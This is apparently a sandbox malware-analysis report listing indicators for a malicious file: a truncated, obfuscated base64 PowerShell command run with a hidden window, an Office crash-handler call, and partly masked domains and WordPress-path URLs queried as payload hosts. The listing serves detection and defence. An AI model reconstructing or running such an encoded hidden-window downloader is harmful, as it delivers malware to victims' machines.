Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDAG4ANABuADEAZABkAD0AJwBPAGgAdwB2AHAAeABmACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBgAGMAYABVAHIAaQBgAFQAWQBwAGAAUgBvAHQAYABPAGMAbwBMACIAIAA9AC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1576
- %TEMP%\1206589.cvr
- 'pm###uetil.com':443
- 'x1.#.lencr.org':80
- 'hs###vling.com':443
- 'vt###ebu.com':80
- 'vt###ebu.com':443
- 'co####phongthan.com':80
- 'gl####ndelmaxima.nl':80
- http://x1.#.lencr.org/
- http://vt###ebu.com/wp-content/upgrade/qo_4f_q/
- http://co####phongthan.com/mainto/p_e9_nzbfcj04oi/
- http://gl####ndelmaxima.nl/wp-admin/ivtu_6l7_yyn42mu35/
- 'pm###uetil.com':443
- 'hs###vling.com':443
- 'vt###ebu.com':443
- DNS ASK pm###uetil.com
- DNS ASK x1.#.lencr.org
- DNS ASK hs###vling.com
- DNS ASK vt###ebu.com
- DNS ASK co####phongthan.com
- DNS ASK gl####ndelmaxima.nl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDAG4ANABuADEAZABkAD0AJwBPAGgAdwB2AHAAeABmACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBgAGMAYABVAHIAaQBgAFQAWQBwAGAAUgBvAHQAYABPAGMAbwBMACIAIAA9AC...' (with hidden window)